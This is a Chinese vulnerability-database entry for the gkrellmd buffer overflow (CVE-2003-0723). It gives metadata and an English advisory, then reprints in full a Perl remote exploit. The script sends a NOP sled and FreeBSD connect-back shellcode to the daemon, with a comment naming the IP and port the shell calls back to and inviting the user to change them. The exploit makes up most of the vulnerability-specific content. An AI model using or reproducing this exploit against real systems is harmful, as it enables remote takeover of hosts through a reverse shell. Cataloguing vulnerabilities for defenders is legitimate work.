gkrellm gkrellmd缓冲区溢出漏洞

gkrellm gkrellmd缓冲区溢出漏洞

漏洞ID 1107395 漏洞类型 缓冲区溢出
发布时间 2003-06-24 更新时间 2003-10-20
图片[1]-gkrellm gkrellmd缓冲区溢出漏洞-安全小百科CVE编号 CVE-2003-0723
图片[2]-gkrellm gkrellmd缓冲区溢出漏洞-安全小百科CNNVD-ID CNNVD-200310-032
漏洞平台 FreeBSD CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22832
https://www.securityfocus.com/bid/82747
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200310-032
|漏洞详情
gkrellm2.1.14之前2.1.x版本的gkrellmd存在缓冲区溢出漏洞。远程攻击者利用该漏洞执行任意代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/8022/info
 
GKrellMd has been reported prone to a remote buffer overflow vulnerability, arbitrary code execution is possible.
 
The issue presents itself due to a lack of sufficient bounds checking performed on network-based data. If data exceeding the maximum reserved memory buffer size is received arbitrary memory may be corrupted.
 
A remote attacker may ultimately exploit this issue remotely to seize control of the affected daemon and execute arbitrary code.
 
This vulnerability has been reported to affect Gkrellm 2.1.13.

#!/usr/bin/perl -s
# kokaninATdtors.net playing with gkrellmd on FreeBSD 4.8-RELEASE
# advisory on http://packetstormsecurity.nl/0306-exploits/gkrellmd
# I just ripped their code and made it do something useful instead
# shellcode by bighawk(i think) - wow this is badly formatted.

use IO::Socket;
if(!$ARGV[0] || !$ARGV[1])
{ print "usage: ./DSR-geekrellm.pl <host> <port> (default gkrellmd is 19150)n"; exit(-1); }

$host = $ARGV[0];
$port = $ARGV[1];
$ret = pack("l",0xbfbffa60);
$shellcode = "x31xc9xf7xe1x51x41x51x41x51x51xb0x61xcdx80x89xc3x68xd9x9dx26x26x66x68x27x10x66x51x89xe6xb2x10x52x56x50x50xb0x62xcdx80x41xb0x5ax49x51x53x53xcdx80x41xe2xf5x51x68x2fx2fx73x68x68x2fx62x69x6ex89xe3x51x54x53x53xb0x3bxcdx80";
#--> connect-back to a useless ip, change it:)                                     ^^217.157.38.38^        ^^10000^
$nop = "x90";
$buf = "A" x 128 . $ret x 2 . $nop x 500 . $shellcode;

$socket = new IO::Socket::INET
(
Proto    => "tcp",
PeerAddr => $host,
PeerPort => $port,
);

die "unable to connect to $host:$port ($!)n" unless $socket;

print $socket "gkrellm 2.1.10n"; #tell the daemon wich client we have
sleep(1); #might have to adjust this on slow connections
print $socket $buf;

close($socket);
|受影响的产品
GKrellM GKrellM 2.1.7

GKrellM GKrellM 2.1.13

|参考资料

来源:MANDRAKE
名称:MDKSA-2003:087
链接:http://www.mandriva.com/security/advisories?name=MDKSA-2003:087

相关推荐: Raptor Firewall Zero Length UDP Packet Resource Consumption Vulnerability

Raptor Firewall Zero Length UDP Packet Resource Consumption Vulnerability 漏洞ID 1102793 漏洞类型 Failure to Handle Exceptional Conditio…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享